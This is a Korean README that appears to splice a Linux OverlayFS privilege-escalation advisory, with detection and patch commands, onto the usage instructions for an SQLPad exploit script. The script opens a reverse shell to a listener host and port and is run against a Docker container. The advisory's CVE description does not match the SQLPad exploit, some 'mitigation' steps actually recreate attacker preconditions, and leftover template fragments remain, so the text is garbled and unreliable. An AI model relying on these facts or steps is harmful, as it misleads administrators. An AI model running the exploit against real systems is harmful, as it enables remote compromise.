
CVE-2022-0944에 대한 익스플로잇 및 완화 가이드로, OverlayFS의 Linux 커널 권한 상승 취약점이며, 탐지 스크립트 및 패치 지침을 포함합니다.
OverlayFS의 Linux 커널 권한 상승 취약점에 대한 보안 권고 및 완화 가이드입니다.
CVE-2022-0944는 특정 구성에서 파일 생성 처리 부적절로 인해 로컬 공격자가 권한을 상승시킬 수 있는 Linux 커널 OverlayFS 하위 시스템의 보안 취약점입니다.

🚨 영향
로컬 공격자는 다음을 수행할 수 있습니다:
조작된 파일 작업을 통해 루트 권한 획득
보안 제한 우회
중요 시스템 파일 수정
전체 시스템 무결성 손상
🔍 탐지
grep CVE-2022-0944 /var/log/apt/history.log
# RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ 완화 방법
공식 패치
다음 패치된 버전 중 하나로 업데이트하세요:
Linux 커널 5.16.12 이상
공급업체별 백포트 패치
업데이트 명령어:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
해결 방법 (즉시 패치가 불가능한 경우)
OverlayFS 사용 제한:
sudo modprobe -r overlay
네임스페이스 제한 구현:
# 권한 없는 사용자 네임스페이스 생성
unshare -Ur
# 사용자 제한이 있는 마운트
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
SELinux/AppArmor 정책 적용: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ 면책 조항 이 문서는 정보 제공 목적으로만 제공됩니다. 정확성을 위해 노력했지만 보증하지는 않습니다. 프로덕션 환경에 배포하기 전에 항상 개발 환경에서 패치를 테스트하세요.
마지막 업데이트: 2023-10-01 | 변경 로그 보기
주요 기능:
이 README 형식은 다음에 적합합니다:
다음을 원하시나요:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url SQLPad URL
lhost 리버스 셸을 위한 리스너 호스트 주소
lport 리버스 셸을 위한 리스너 포트
username 로그인 사용자 이름 (선택 사항)
password 로그인 비밀번호 (선택 사항)
options:
-h, --help 도움말 메시지 표시 후 종료
예시:
# 요구 사항 설치
pip install -r requirements.txt
# sqlpad docker 컨테이너 시작
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# 익스플로잇 실행
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
이 저장소에는 교육 목적, 특히 사이버 보안 과정 및 학습 환경에서만 사용하기 위한 코드와 도구가 포함되어 있습니다. 이 코드의 작성자는 이 코드의 사용, 오용 또는 수정으로 인해 발생하는 어떠한 결과에 대해서도 책임을 지지 않습니다. 이 코드는 특정 목적에 대한 상업성 또는 적합성에 대한 묵시적 보증을 포함하되 이에 국한되지 않고 명시적이거나 묵시적인 어떠한 보증 없이 "있는 그대로" 제공됩니다.